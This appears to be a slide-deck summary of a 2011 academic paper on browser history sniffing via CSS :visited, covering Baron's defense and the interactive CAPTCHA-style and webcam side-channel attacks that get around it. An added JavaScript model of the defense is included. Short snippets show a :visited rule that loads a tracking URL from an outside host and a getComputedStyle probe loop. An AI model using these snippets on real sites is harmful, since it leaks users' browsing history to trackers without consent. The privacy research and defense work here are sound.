I Still Know What You Visited Last Summer: User interaction and side-channel attacks on browsing history

Zachary Weinberg, Eric Y. Chen, Pavithra Ramesh Jayaraman, Collin Jackson
Carnegie Mellon University
IEEE Symposium on Security and Privacy, May 2011


Page 1: Title

I Still Know What You Visited Last Summer: User interaction and side-channel attacks on browsing history

Zachary Weinberg, Eric Y. Chen, Pavithra Ramesh Jayaraman, Collin Jackson

Carnegie Mellon University

IEEE Symposium on Security and Privacy, May 2011

Page 2 (no recoverable text)

Page 3: Outline

- Introduction
- Automated Attacks
- Exp 1: Interactive Attacks
- Exp 2: Side-Channel Attacks
- Related Work
- Conclusion

Page 4: Introduction

History sniffing through CSS :visited
Andrew Clover, 2002, http://seclists.org/bugtraq/2002/Feb/271

In HTML:

    <a id="link1" href="http://google.com/">Visit Google!</a>

In CSS:

    #link1:visited {
        color: red;
        background: url(http://140.115.53.28/track.php?url=google.com);
    }

Page 5: Introduction

L. David Baron, 2010, http://dbaron.org/mozilla/visited-privacy
- make getComputedStyle act as though all links are unvisited
- make certain CSS selectors act as though links are always unvisited
- limit the CSS properties that can be used to style visited links to color, background-color, border-*-color, outline-color, column-rule-color, fill, and stroke

The latest versions of Firefox, Chrome, Safari, and IE all adopt this defense, but they remain vulnerable to interactive attacks.

Page 6: Introduction

Dongseok Jang et al., An Empirical Study of Privacy-Violating Information Flows in JavaScript Web Applications
- Small sets of links (6~220) probed by real exploiters
- 46 popular websites, including one from the Alexa Top 100
- Probe sets this small make interactive attacks feasible

Page 7: Introduction

What can history sniffers do?

Benign:
- Websites could use history sniffing to determine whether their users have visited known phishing sites.
- Websites could seed visitors' history with URLs made up for the purpose, and use those URLs to re-identify their visitors (cf. cookies).

Malicious:
- Track visitors across sites for advertising purposes, determining whether they also visit a site's competitors.
- Attackers can construct more targeted phishing pages by impersonating only sites that a particular victim is known to visit.

Page 8: Automated Attacks

Direct sniffing

    <style> a:visited { color: red; } </style>

    var url_array = new Array('http://a.com', 'http://b.com');
    var visited_array = new Array();
    var link_el = document.createElement('a');
    var computed_style = document.defaultView.getComputedStyle(link_el, "");
    for (var i = 0; i < url_array.length; i++) {
        link_el.href = url_array[i];   // url_array, not array: the list of URLs being probed
        if (computed_style.getPropertyValue("color") == 'rgb(255, 0, 0)') {
            visited_array.push(url_array[i]);   // red means the :visited rule applied
        }
    }
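To make the page 5 defense concrete, and to show why the direct-sniffing probe above returns nothing once it is in place, here is an added example that is not code from the paper or from the slides: a toy JavaScript model of Baron's rules. The rule objects, the function names (sanitizeVisitedRule, computedStyle, directSniff), the sample stylesheet and the tracker host are constructed for this demo; browsers enforce the same policy inside their style engines, not through an API like this.

```javascript
// Added example, not code from the paper or the slides: a toy model of the
// :visited defense the slides attribute to L. David Baron (page 5). Rule
// objects, function names, the sample stylesheet and the tracker host are
// constructed for this demo; browsers enforce the same policy in their
// style engines, not through an API like this.

// Properties a :visited rule may still set, as listed on the slides.
// "border-*-color" is expanded here to border-color plus the four per-side
// colors; that expansion is an assumption of this demo.
const VISITED_ALLOWED = new Set([
  "color", "background-color", "border-color", "border-top-color",
  "border-right-color", "border-bottom-color", "border-left-color",
  "outline-color", "column-rule-color", "fill", "stroke",
]);

// Split a rule's declarations into what the defense keeps and what it drops.
// Non-:visited rules are kept whole. The dropped list doubles as a linter
// result: any property in it (background-image, font-size, display, ...)
// could otherwise have leaked visited-ness through a request, a layout
// shift or a timing difference.
function sanitizeVisitedRule(rule) {
  const kept = {};
  const dropped = [];
  const restricted = rule.selector.includes(":visited");
  for (const [prop, value] of Object.entries(rule.declarations)) {
    if (!restricted || VISITED_ALLOWED.has(prop)) kept[prop] = value;
    else dropped.push(prop);
  }
  return { kept, dropped };
}

// Style of one link. forScript=true models getComputedStyle: scripts see
// every link as unvisited, so :visited rules never apply. forScript=false
// models painting: sanitized :visited rules apply to links really in the
// history, so the user still sees the (color-only) difference.
function computedStyle(href, history, rules, forScript) {
  const style = { color: "rgb(0, 0, 238)", "background-image": "none" };
  const visited = history.has(href);
  for (const rule of rules) {
    if (rule.selector.includes(":visited") && (forScript || !visited)) continue;
    Object.assign(style, sanitizeVisitedRule(rule).kept);
  }
  return style;
}

// The direct-sniffing probe from the slide above, run against the model:
// it keeps every URL whose script-visible color is the :visited red.
// Under the defense the result is always empty.
function directSniff(urls, history, rules) {
  return urls.filter(u => computedStyle(u, history, rules, true).color === "rgb(255, 0, 0)");
}

// Constructed sample: a Clover-style stylesheet that smuggles a tracking
// image into :visited, and a one-entry history.
const SAMPLE_RULES = [
  { selector: "a", declarations: { color: "rgb(0, 0, 238)" } },
  { selector: "a:visited", declarations: {
      color: "rgb(255, 0, 0)",
      "background-image": "url(http://tracker.example/track.php?url=a.com)", // placeholder host
  } },
];
const SAMPLE_HISTORY = new Set(["http://a.com"]);

console.log("dropped from :visited:", sanitizeVisitedRule(SAMPLE_RULES[1]).dropped);
console.log("painted:", computedStyle("http://a.com", SAMPLE_HISTORY, SAMPLE_RULES, false));
console.log("script sees:", computedStyle("http://a.com", SAMPLE_HISTORY, SAMPLE_RULES, true));
console.log("sniffed:", directSniff(["http://a.com", "http://b.com"], SAMPLE_HISTORY, SAMPLE_RULES));
```

The two halves of the model map to the two halves of the defense: sanitizeVisitedRule is the property whitelist (the background-image tracker is dropped before it can fire), and the forScript flag is the lie told to getComputedStyle, which is what turns the probe's visited_array into an empty list. The dropped list is also what a stylesheet reviewer would look at when auditing third-party CSS for :visited rules that should not be there.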

Page 9: Automated Attacks

Indirect sniffing
- Make visited and unvisited links take different amounts of space, which causes unrelated elements on the page to move; inspect the positions of those other elements.
- Make visited and unvisited links cause different images to load (a background-image style in the :visited rule). Does not require JavaScript.

Page 10: Automated Attacks

Side-channel sniffing
- Timing attacks: the attacker can make the page take longer to lay out if a link is visited than if it is unvisited
- Transparent underline
- Any other style rules in :visited

Defense: Baron's solution does well against all three types above (direct/indirect/side-channel).

Page 11: Exp 1: Interactive Attacks

- Requires victims to interact with malicious sites
- The authors claim that interactive attacks can be disguised as "normal" interactive tasks that users will not find surprising or suspicious
- Amazon's Mechanical Turk: recruited 307 participants
- All tasks in this experiment operate within the constraints of Baron's defense: visited-link styles only change the color on the screen
- Pretend to be CAPTCHA tests (CAPTCHA: Completely Automated Public Turing test to tell Computers and Humans Apart)

Page 12: Exp 1: Interactive Attacks

1. Word CAPTCHA
- Each word is a hyperlink to a URL that the attacker wishes to probe
- If unvisited, it is drawn in the same color as the background.

Page 13: Exp 1: Interactive Attacks

2. Character CAPTCHA
- Seven-segment LCD symbols
- Every letter represents 3 URLs
- Site-supplied font

Page 14: Exp 1: Interactive Attacks

4 + 5 = 9 ; 4 + F = A ; 5 + F = 6 ; 4 + 5 + F = 8
"-" is always on

Page 15: Exp 1: Interactive Attacks

3. Chessboard puzzle
- Each square contains a URL
- Only the pawns corresponding to visited sites are made visible
- SVG or text is used to control the pawns

Page 16: Exp 1: Interactive Attacks

4. Pattern matching puzzle

Page 17: Exp 1: Interactive Attacks

Randomly generated task instances corresponding to known proportions of visited and unvisited links.

Page 18: Exp 1: Interactive Attacks

- Automated history-sniffing exploits run on all the participants
- URL set from wtikay.com: 7012 commonly visited URLs (from the Alexa Top 5000)

Pages 19-23: Exp 1: Interactive Attacks (result figures; no recoverable text)

Page 24: Exp 2: Side-channel Attacks

Webcam attacks
- <blink>
- Random 20 URLs with 10 visited ones
- Variant 1: designed to comply with the WCAG standard for seizure safety
- Variant 2: make the entire browser window flash, with a brighter color

Page 25: Exp 2: Side-channel Attacks

Author test
- 100% accuracy for both variants in all conditions
- Well-lit room; person stays still in front of the computer
- In a dark room, accuracy dropped to 50%

Field test: 60 / 307 participants

Page 26: Exp 2: Side-channel Attacks

Field test (results figure; no recoverable text)

Page 27: Exp 2: Side-channel Attacks

- In real life: the ChatRoulette service
- The attack works even when the closest reflector is a wall 10 to 20 feet away from the monitor

Page 28: Related Work

- Page cache: Felten et al., Timing Attacks on Web Privacy
- DNS cache: Felten et al., Timing Attacks on Web Privacy
- Both tactics above: only for the first time; short-term history only
- Resources loadable cross-origin but only available to logged-in users (Facebook, Gmail, Twitter, etc.): JavaScript onerror event

Page 29: Related Work

- Cookies, Flash Player local shared objects
- Ad-blockers, private browsing mode

Page 30: Conclusion

- Automated history sniffing attacks have successfully been blocked by Baron's solution
- Interactive attacks are not
- This paper developed proof-of-concept exploits for 6 history sniffing attacks against Baron's defense: 4 interactive attacks and 2 that detect the screen through a webcam